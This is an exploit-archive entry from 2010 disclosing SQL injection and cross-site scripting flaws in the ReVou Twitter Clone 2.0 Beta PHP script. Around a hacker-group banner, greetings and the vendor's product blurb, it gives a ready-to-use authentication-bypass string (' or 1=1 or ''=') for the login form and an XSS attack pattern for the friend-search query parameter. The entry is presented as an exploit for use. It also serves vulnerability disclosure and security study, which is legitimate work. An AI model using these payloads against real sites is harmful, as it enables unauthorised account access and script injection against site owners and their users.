ReVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting

EDB-ID:

13752

CVE:

N/A

EDB Verified:

Author:

Sid3^effects

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-06-06

Vulnerable App: 
# Title:reVou twitter clne Beta 2.0 sqli and Xss vulnerability
# Author: Sid3^effects
# Published: 2010-06-06
# price:$99
# email:shell_c99@yahoo.com
# vendor: Revou
# url : http://www.revou.com/demo/home

############################################################################
        ooooo  .oooooo.  oooooo   oooooo     oooo 
        `888' d8P'  `Y8b  `888.    `888.     .8' 
         888 888           `888.   .8888.   .8' 
         888 888            `888  .8'`888. .8' 
         888 888             `888.8'  `888.8'  
         888 `88b    ooo      `888'    `888' 
        o888o `Y8bood8P'       `8'      `8'    
                                          
-------------------------------------------------------------------------------------- 
#####################Sid3^effects aKa HaRi################################## 
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] 
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L,CR4C|< 008,M4n0j,MaYuR 
#ShouTZ:kedar,dec0d3r,41.w4r10r
#spl shoutz:LiquidWorm,gunslinger_ :D      
#Catch us at www.andhrahackers.com or www.teamicw.in 
############################################################################ 
Description :
Existing site owners can benefit from running a micro blogging service resulting in more viral growth for your website when your users interact with follow
friends by receiving updates via our social network platform. With our SMS integration as well as custom API, we allow you to gain more revenues through
purchase of SMS credits, revenues from web advertisements and as well benefiting from 3rd party applications built for your site using our API.
 
ReVou Micro Blogging social networking script can use for any industries ranging from real estate, cooperate events, hobbyist websites or any social
networking sites which you can create a platform for your users to get updates or interact with each other.
 
############################################################################ 
Xploit : sqli vulnerability.

use ' or 1=1 or ''=' to login
Demo Url : http://server/path/
############################################################################
Xploit : xss  vulnerability
 Parameter Name: search friends or groups
 Parameter Type: Querystring  
 Attack Pattern: '"-->
         
############################################################################ 
#spl thks: exploit-db.com
#Sid3^effects
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services